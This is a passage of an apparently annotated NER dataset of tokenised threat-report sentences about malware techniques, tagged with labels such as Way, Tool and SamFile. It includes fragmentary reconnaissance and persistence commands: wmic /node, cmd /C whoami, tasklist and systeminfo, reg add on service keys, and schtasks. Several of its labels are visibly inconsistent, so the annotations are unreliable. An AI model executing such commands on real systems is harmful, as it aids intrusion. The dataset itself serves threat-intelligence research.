"tokens": [ "perform", "WMI", "queries" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "uses", "WMI", "for", "lateral", "movement", "and", "information", "gathering." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "runs", "WMI", "queries", "every", "second", "to", "get", "all", "process", "creation", "and", "termination", "events." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "lateral", "movement", "scripts", "such", "as", "WMIExec." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "use", "locally", "configured", "proxies." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "can", "use", "XOR,", "TEA,", "RC4", "and", "a", "modified", "AES", "algorithm", "to", "encrypt", "traffic", "and", "files." ], "ner_tags": [ "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "It", "is", "encrypted", "using", "the", "AES", "algorithm" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "application", "and", "the", "accompanying", "relevant", "and", "malicious", "DLL", "were", "both", "embedded", "in", "the", "loader’s", "resources." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "embedded", "DLL" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "embedded", "DLL" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "It", "also", "embeds", "a", "DLL", "version", "of", "the", "Pafish", "(aka", "Paranoid", "Fish)", "sandbox", "and", "analysis", "detection", "tool", "as", "one", "of", "its", "encrypted", "resources" ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "module", "is", "embedded", "in", "the", "library’s", "resource", "section", "and", "encrypted", "with", "an", "algorithm", "similar", "to", "RC4" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "function", "used", "to", "encrypt", "and", "decrypt", "the", "embedded", "module" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Another", "component", "collects", "information", "about", "mapped", "volumes,", "including", "mount", "point,", "name,", "drive", "type,", "and", "disk", "usage", "data." ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "O", "I-Features", "O", "O", "I-Features", "O", "B-Features", "I-Features", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "This", "is", "sent", "to", "the", "server", "along", "with", "the", "computer’s", "name" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "includes", "bidirectional", "file", "transfers", "between", "the", "C&C", "and", "the", "compromised", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "configuration", "corresponds", "to", "resource", "1000", "in", "the", "initial", "loader.", "It", "defines", "the", "address", "and", "port", "for", "both", "the", "exfiltration", "server", "(file_server)", "and", "the", "C&C", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "given", "command", "line." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "is", "protected", "with", "DNGuard,", "a", "commercial", ".NET", "packer." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "uses", "both", "regular", "and", "reflective", "DLL", "injection." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Way" ] }, { "tokens": [ "proxy/tunneling", "utilities", "(HTran,", "LCX,", "EarthWorm" ], "ner_tags": [ "O", "O", "B-Way", "B-Org", "B-Org" ] }, { "tokens": [ "read", "from", "a", "file", "on", "disk", "or", "a", "registry", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "components", "use", "registry", "keys", "to", "signal", "each", "other." ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "it", "collects", "usernames" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "usernames" ], "ner_tags": [ "O" ] }, { "tokens": [ "directory", "listings" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "directory", "listings", "were", "harvested", "as", "a", "result." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "hostnames" ], "ner_tags": [ "O" ] }, { "tokens": [ "machine", "names" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "execution", "using", "scheduled", "tasks" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "downloaded", "and", "run", "by", "the", "plaintext", "PY", "files", "from", "external", "infrastructure." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "it", "download", "and", "execute", "yet", "another", "Python", "script" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Code", "responsible", "for", "downloading", "cron_script", "file" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "keylogging", "functionality." ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "malware", "hidden", "inside", "the", "Python", "compiled", "byte", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malicious", "code", "is", "embedded", "in", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "unpacking" ], "ner_tags": [ "O" ] }, { "tokens": [ "Obfuscation", "is", "one", "of", "the", "most", "popular", "methods", "to", "achieve", "this." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "JavaScript", "obfuscation", "was", "used" ], "ner_tags": [ "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "use", "of", "various", "obfuscation", "techniques", "in", "malware" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "most", "popular", "obfuscation", "techniques", "is", "execution", "of", "Base64-encoded", "malicious", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "use", "of", "W4SP", "crew", "obfuscation", "tools", "such", "as", "Hyperion", "and", "Kramer" ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool" ] }, { "tokens": [ "The", "inspected", "UEFI", "firmware", "was", "tampered", "with", "to", "embed", "a", "malicious", "code", "that", "we", "dub", "MoonBounce;" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "be", "embedded", "in", "the", "loader", "itself." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "stages", "execution", "of", "further", "payloads", "downloaded", "from", "the", "internet" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attempts", "to", "fetch", "another", "stage", "of", "the", "payload", "to", "run", "in", "memory," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stage", "the", "execution", "of", "additional", "plugins", "in", "memory," ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Download", "a", "file", "from", "the", "C2", "server" ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "reaching", "out", "to", "the", "server", "to", "obtain", "a", "further", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "execution", "of", "several", "functions", "in", "the", "EFI", "Boot", "Services", "Table,", "namely", "AllocatePool,", "CreateEventEx", "and", "ExitBootServices" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "using", "the", "WinExec", "API" ], "ner_tags": [ "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "injecting", "it", "into", "an", "svchost.exe", "process," ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "injecting", "it", "to", "the", "address", "space", "of", "another", "process." ], "ner_tags": [ "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "injected", "process" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "an", "encrypted", "blob" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "encrypted", "ScrambleCross", "shellcode" ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "an", "encrypted", "configuration", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "facilitates", "the", "functionality", "of", "WMI", "in", "Windows" ], "ner_tags": [ "B-Features", "O", "B-Features", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "when", "the", "WMI", "service", "was", "initiated" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "upon", "initiation", "of", "the", "WMI", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Usage", "of", "WMI", "for", "remote", "command", "execution" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "wmic", "/node:<" ], "ner_tags": [ "O", "B-SamFile" ] }, { "tokens": [ "It", "works", "by", "decrypting", "a", "shellcode", "BLOB", "with", "AES-256" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "through", "the", "command", "line", "as" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "via", "a", "Windows", "batch", "script", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "issuing", "the", "following", "command", "line" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Write", "text", "to", "a", "given", "*.bat", "file", "and", "execute", "it" ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "Run", "a", "shell", "command" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "examples", "of", "command", "lines" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "cmd", "/C" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "executing", "a", "launcher", "utility", "with", "the", "filename", "System.Mail.Service.dll", "(MD5:", "5F9020983A61446A77AF1976247C443D)", "through", "the", "command", "line", "as", "a", "service." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "reg", "add", "\"HKLM\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Svchost\"" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "reg", "add", "\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\iscsiwmi\\Parameters\"" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "reg", "add", "\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\iscsiwmi\\Parameters\"", "/" ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "The", "second", "way", "to", "execute", "StealthMutant", "is", "through", "the", "creation", "of", "a", "scheduled", "task" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "schtasks", "/create", "/TN" ], "ner_tags": [ "B-Way", "B-Way", "B-Way" ] }, { "tokens": [ "schtasks", "/run" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Both", "the", "IP", "and", "the", "server", "directory", "path", "are", "encrypted", "with", "AES-128", "using", "a", "base64", "encoded", "key", "stored", "in", "the", "backdoor’s", "image." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "commands", "retrieved", "from", "the", "server", "are", "also", "encrypted", "with", "AES-128" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Get", "list", "of", "drives" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Get", "content", "list", "from", "a", "specified", "directory" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "/C", "\"C:", "&", "cd", "\\", "&", "dir", "$temp\\", "/od\"" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sending", "back", "the", "result", "of", "the", "command’s", "execution", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "/C", "\"C:", "&", "cd", "\\", "&", "whoami\"" ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "/C", "\"C:", "&", "cd", "\\", "&", "tasklist\"" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "/C", "\"C:", "&", "cd", "\\", "&", "systeminfo\"" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Copying", "of", "files", "across", "SMB", "shares" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "cmd", "/C", "\"C:", "&", "cd", "\\", "&", "arp", "-a\"" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Removal", "of", "artefacts", "from", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "wmic", "/node" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "These", "were", "used", "to", "inject", "the", "payload", "into", "process", "memory." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Adds", "Run", "Registry", "Key", "for", "Persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "persistence", "technique", "is", "simply", "adding", "a", "run", "registry", "key", "for", "persistence" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "added", "to", "the", "startup", "folder" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Screen", "capture" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Screen", "Logger" ], "ner_tags": [ "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "Keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "Keylogger" ], "ner_tags": [ "B-Way" ] }, { "tokens": [ "Gathering", "system", "information" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "System", "Information" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Encoded", "shellcode", "in", "Project", "File" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "contained", "encoded", "executables", "and", "shellcode," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoadLibraryW,", "VirtualAlloc,", "CreateProccessW,", "and", "ZwUnmapViewOfSection." ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "LoadLibraryW", "loads", "the", "module,", "VirtualAlloc", "allocates", "the", "memory,", "CreateProcessW", "created", "a", "process,", "and", "ZwUnmapViewOfSection", "is", "used" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "using", "the", "callback", "function", "pointer", "in", "CallWindowProc" ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "payload", "from", "the", "project", "files", "was", "a", "remote", "access", "tool", "(RAT)", "called", "Remcos." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "two", "large", "arrays", "of", "decimal", "bytes", "were", "decoded", "by", "the", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decoding", "Function" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decoding", "function" ], "ner_tags": [ "O", "B-Features" ] }, { "tokens": [ "Remote", "Command", "Line" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Registry", "Editor" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "stealing", "multiple", "types", "of", "data" ], "ner_tags": [ "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp" ] }, { "tokens": [ "the", "“UsingTask”", "element", "defines", "the", "task", "that", "will", "be", "compiled", "by", "MSBuild." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "MSBuild", "has", "an", "inline", "task", "feature" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Modify", "and", "query", "the", "Windows", "registry" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "query", "the", "Windows", "registry" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Log", "keystrokes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Bypass", "UAC" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Egress", "communications", "over", "HTTP,", "HTTPS" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Way" ] }, { "tokens": [ "Take", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Set", "up", "proxies" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "payloads", "are", "usually", "shellcode", "encrypted", "with", "a", "rolling", "XOR", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "encoded", "payload", "has", "been", "located" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "project", "file", "has", "an", "encoded", "and", "compressed", "payload" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "use", "of", "shellcode,", "encoding,", "compression,", "obfuscated", "strings" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "O" ] }, { "tokens": [ "since", "each", "payload", "will", "be", "encrypted", "with", "different", "keys", "and", "each", "configuration", "will", "uniquely", "change", "the", "hash", "value." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Encrypted", "payloads", "will", "also", "obfuscate", "useful", "strings", "from", "static", "analysis." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "multiple", "stages", "and", "encrypted/obfuscated", "payloads" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "code", "can", "be", "injected", "into", "other", "legitimate", "running", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "payload,", "usually", "shellcode,", "is", "injected", "into", "another", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "The", "shellcode", "is", "then", "executed", "in", "a", "new", "thread." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "endpoint", "with", "a", "system", "injected" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "process", "injection" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "and", "process", "injection" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Inject", "malicious", "code", "into", "legitimate", "processes" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "is", "a", "memory-only", "DLL", "that", "runs", "as", "a", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "that", "pulls", "the", "Cobalt", "Strike", "payload", "from", "a", "fake", "JPG", "file." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "also", "leveraging", "steganography", "to", "locate", "the", "start", "of", "the", "encoded", "payload" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "uses", "a", "different", "custom", "packer" ], "ner_tags": [ "O", "O", "O", "B-Tool", "I-Tool", "I-Tool" ] }, { "tokens": [ "the", "malware", "to", "unpack" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ ",", "it", "extracts,", "decrypts,", "and", "decompresses", "the", "data", "to", "be", "executed", "as", "shellcode." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "payload", "is", "decrypted,", "decompressed,", "and", "then", "copied", "into", "memory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "is", "decrypted", "and", "executed" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decode" ], "ner_tags": [ "O" ] }, { "tokens": [ "domain", "fronting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "or", "download", "additional", "stages." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "drops", "and", "executes", "Cobalt", "Strike", "in", "the", "memory", "space", "of", "“rundll32.exe.”" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "This", "requires", "either", "social", "engineering", "tactics", "to", "get", "the", "target", "to", "execute", "the", "malware", "or", "another", "program/script", "to", "execute", "the", "file." ], "ner_tags": [ "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "optimize", "brute", "forcing", "efforts,", "the", "malware", "compares", "the", "server", "prompt", "upon", "connection", "to", "a", "hardcoded", "list", "of", "strings" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "credentials", "used", "appear", "to", "be", "default", "credentials", "for", "IoT", "devices." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "It", "attempts", "to", "specifically", "gain", "root", "access", "to", "these", "devices", "via", "a", "default", "password" ], "ner_tags": [ "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Like", "the", "earlier", "SSH", "brute-forcing", "campaign" ], "ner_tags": [ "O", "O", "O", "B-Org", "B-Way", "B-OffAct" ] }, { "tokens": [ "brute-forced", "devices" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "optimizing", "the", "brute", "forcing", "implementation" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Code", "for", "the", "brute", "forcing", "implementation", "is", "significantly", "more", "structured" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "added", "to", "support", "the", "Telnet", "brute", "force." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Restart", "Telnet", "brute", "forcing" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "brute", "forcing" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "SSH", "brute", "forcing", "code", "with", "the", "more", "usual", "Telnet", "equivalent." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Telnet", "brute", "forcing", "code", "is", "designed", "primarily", "for", "self-propagation" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SSH", "brute-forcing", "campaign," ], "ner_tags": [ "B-Org", "O", "B-OffAct" ] }, { "tokens": [ "This", "allows", "it", "to", "download", "and", "deploy" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "are", "downloaded", "and", "executed", "in", "the", "victim's", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloader", "to", "the", "compromised", "device", "that", "executes", "and", "downloads", "the", "primary", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "then", "downloads", "its", "payload", "via", "software", "installed", "on", "the", "compromised", "device,", "such", "as", "ftpget,", "wget,", "curl,", "or", "tftp,", "before", "executing", "the", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "It", "uses", "the", "cpuinfo", "Python", "module", "to", "retrieve", "information", "about", "the", "CPU." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "code", "checks", "if", "the", "disk", "size", "is", "greater", "than", "a", "specified", "threshold", "(50", "GB", "as", "example)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "the", "win32api.GetDiskFreeSpaceEx()", "function", "to", "retrieve", "the", "disk", "size", "in", "bytes" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reflective", "PE", "injection" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Reflective", "PE", "injection", "is", "a", "technique", "used", "by", "malware", "or", "advanced", "attackers", "to", "inject", "a", "Portable", "Executable", "(PE)", "file", "directly", "into", "the", "memory", "of", "a", "running", "process", "without", "the", "need", "for", "writing", "the", "file", "to", "disk" ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "B-HackOrg", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 